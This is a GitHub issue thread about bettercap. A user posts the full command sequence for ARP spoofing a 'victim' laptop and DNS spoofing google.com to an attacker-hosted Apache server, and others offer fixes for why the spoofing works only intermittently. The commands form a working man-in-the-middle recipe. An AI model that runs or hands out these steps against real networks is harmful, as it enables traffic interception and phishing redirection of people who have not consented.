### ISSUE TITLE
Can you help me I can't get dns.spoof to work every time?

### ISSUE THREAD

**Issue by Hpro444** [bettercap/bettercap#816]
Bettercap version: 2.28
OS: Kali
Victim: Windows 10 laptop
Commands that I am using:
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -P OUTPUT ACCEPT
- iptables -P INPUT ACCEPT
- service apache2 start
 - set arp.spoof.targets 192.168.1.5
 - set arp.spoof.fullduplex true
 - net.probe on
 - arp.spoof on
 - set net.sniff.local true
 - net.sniff on
 - set dns.spoof.domains google.com,*.google.com
 - set dns.spoof.all true
 - dns.spoof on
Expected behavior: Every time victim goes to google.com I want it to be redirected to my IP where I'm hosting the apache2 server.
Actual behavior: Sometimes it does work, sometimes it does not...
And every time before testing I clear search history.
Can someone help me?
And one more thing I run this code with -debug and i cant find where did it save the output, if someone could tell me where it is so i can attach it here as well.

**Comment by evilsocket** [comment]
try to run net.probe for a while, then turn it off and start arp.spoof

**Comment by Hpro444** [comment]
arp.spoof works, I run arp -a and it shows my kalis mac, the only thing that does not work is dns.spoof

**Comment by Hpro444** [comment]
I tried your suggestion, and did't work for me. I still don't get redirected to my apache2 server...

**Comment by lecatos** [comment]
I know why

**Comment by Hpro444** [comment]
Why?

**Comment by Hpro444** [comment]
> I know why

Why?

**Comment by lecatos** [comment]
configure it in your host file

**Comment by anthares101** [comment]
Im having the same problem, maybe the `dns.spoof` is a bit unstable?

```
PS C:\Users\hered> nslookup anthares101.corn
Servidor:  UnKnown
Address:  192.168.18.1

Respuesta no autoritativa:
Nombre:  anthares101.corn
Address:  192.168.18.59

PS C:\Users\hered> nslookup anthares101.corn
Servidor:  UnKnown
Address:  192.168.18.1

*** UnKnown no encuentra anthares101.corn: Non-existent domain
PS C:\Users\hered> nslookup anthares101.corn
Servidor:  UnKnown
Address:  192.168.18.1

*** UnKnown no encuentra anthares101.corn: Non-existent domain
PS C:\Users\hered> nslookup anthares101.corn
Servidor:  UnKnown
Address:  192.168.18.1

Nombre:  anthares101.corn
Address:  ::ffff:192.168.18.59
```

I could not test the host file solution suggested, if it really fix the issue the module has a pretty peculiar way of working tbh 😄

**Comment by ChillVibesMushroom** [comment]
> configure it in your host file

Do you mean bettercap host file or the apache2 host file

**Comment by Moosa-Imran** [comment]
Try clearing the browsing history, including the cache, from the victim's browser. Then, you will see that it works. This is because our browsers store a cache for DNS.
